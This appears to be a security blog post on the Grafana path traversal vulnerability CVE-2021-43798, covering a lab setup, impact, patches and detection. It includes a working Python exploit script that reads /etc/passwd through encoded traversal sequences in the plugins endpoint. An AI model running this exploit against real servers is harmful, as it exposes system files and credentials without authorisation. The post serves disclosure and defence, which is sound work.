CVE-2021-43798: Dissecting the Grafana Path Traversal Vulnerability

Introduction

CVE-2021-43798 is a high-severity (CVSS score: 7.5) vulnerability impacting Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched releases). This vulnerability allows attackers to perform directory traversal attacks through installed plugins, potentially leading to sensitive information disclosure. In this blog, we will dissect the technical details, impact potential and a proof of concept of this path traversal vulnerability using an exploit script.

Technical Details

Grafana offers a public API endpoint, /public/plugins/:pluginId, designed to access a plugin's assets. This functionality works by supplying a valid :pluginId and specifying the desired file path, like /img/logo. However, improper validation of user-supplied input within this endpoint creates a path traversal vulnerability.

By crafting a malicious request with a specially crafted :pluginId containing directory traversal sequences (e.g., ../../../../), attackers can navigate outside the intended plugin directory and potentially access arbitrary files on the underlying system.

Exploit Script

import sys
import requests

def main():
    if len(sys.argv) != 3:
        print("Usage: python exploit.py <IP> <port>")
        sys.exit(1)

    ip = sys.argv[1]
    port = sys.argv[2]
    url = f"http://{ip}:{port}/public/plugins/alertlist/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
    
    try:
        response = requests.get(url)
        print(response.text)
    except requests.exceptions.RequestException as e:
        print("Error:", e)

if __name__ == "__main__":
    main()
Here’s the explanation for the above exploit script:
  1. Crafting a malicious URL: The script constructs a URL that includes the target IP, port, /public/plugins/, and a series of "../" segments.

  2. Targeting vulnerable path: In vulnerable Grafana versions, this crafted URL would bypass intended file access restrictions and allow the script to reach files outside the /public/plugins/ directory.

  3. Accessing /etc/passwd: The script specifically tries to reach the /etc/passwd file, potentially containing user account information.

Proof of Concept

To see a proof of concept in action, we will have to first set up and host a vulnerable version of Grafana in our local environment. We can do this using docker. Following docker-compose.yml will get the job done.

version: '2'
services:
  web:
	image: grafana/grafana-enterprise:8.2.0
	ports:
	- "3000:3000"

Let’s run this and get our container hosting the Grafana image up and running.

docker-compose up

We can verify it by accessing http://localhost:3000

Once we have the Grafana hosted, we can go ahead and use our script to exploit this path traversal vulnerability.

python exploit.py localhost 3000

This shows that the vulnerable API endpoint did allow us to traverse through and read our desired file on the system.

Impact

A successful exploit of CVE-2021-43798 could grant attackers access to various sensitive information on the vulnerable Grafana server, including:

  • System configuration files

  • Grafana configuration files containing database credentials

  • Application logs containing sensitive data

In some cases, attackers might even leverage this vulnerability to achieve code execution on the server.

Remediation

Upgrading Grafana to patched versions (8.0.7, 8.1.8, 8.2.7, or 8.3.1) is the primary mitigation strategy. Additionally, administrators can implement the following measures:

  • Enforce stricter access controls on Grafana deployments.

  • Limit access to the vulnerable API endpoint if possible.

  • Regularly review and update installed plugins to minimize the attack surface.

Detection

Security researchers can leverage various techniques to detect potential exploitation attempts of CVE-2021-43798, including:

  • Monitoring web server logs for suspicious requests targeting the /public/plugins/ endpoint, particularly those containing unusual path elements.

  • Utilizing Web Application Firewalls (WAFs) configured to identify and block malicious requests targeting this vulnerability.

Conclusion

CVE-2021-43798 highlights the importance of timely patching and implementing secure coding practices. By understanding the technical aspects of this vulnerability, security researchers can develop better detection mechanisms and contribute towards a more secure Grafana ecosystem.

Disclaimer

The information presented in this blog post is for educational purposes only. It is intended to raise awareness about the CVE-2021-43798 vulnerability and help mitigate the risks. It is not intended to be used for malicious purposes.

It's crucial to understand that messing around with vulnerabilities in live systems without permission is not just against the law, but it also comes with serious risks. This blog post does not support or encourage any activities that could help with such unauthorized actions.

CVE-2024-22416: CSRF Vulnerability in pyLoad (pyload-ng)
CVE-2024-22416: CSRF Vulnerability in pyLoad (pyload-ng)
2024-05-19
James McGill
CVE-2023-1177: Path Traversal Vulnerability in MLflow
CVE-2023-1177: Path Traversal Vulnerability in MLflow
2024-05-19
James McGill
CVE-2024-1561: Unauthorized Local File Read Vulnerability in Gradio Applications
CVE-2024-1561: Unauthorized Local File Read Vulnerability in Gradio Applications
2024-05-12
James McGill
CVE-2024-27956: SQL Injection Vulnerability in ValvePress Automatic (WP-Automatic)
CVE-2024-27956: SQL Injection Vulnerability in ValvePress Automatic (WP-Automatic)
2024-05-05
James McGill
CVE-2023-23752: Improper Access Control in Joomla! Versions 4.0.0 through 4.2.7
CVE-2023-23752: Improper Access Control in Joomla! Versions 4.0.0 through 4.2.7
2024-05-05
James McGill
CVE-2024-4040: A Critical CrushFTP Server-Side Template Injection Vulnerability
CVE-2024-4040: A Critical CrushFTP Server-Side Template Injection Vulnerability
2024-05-02
James McGill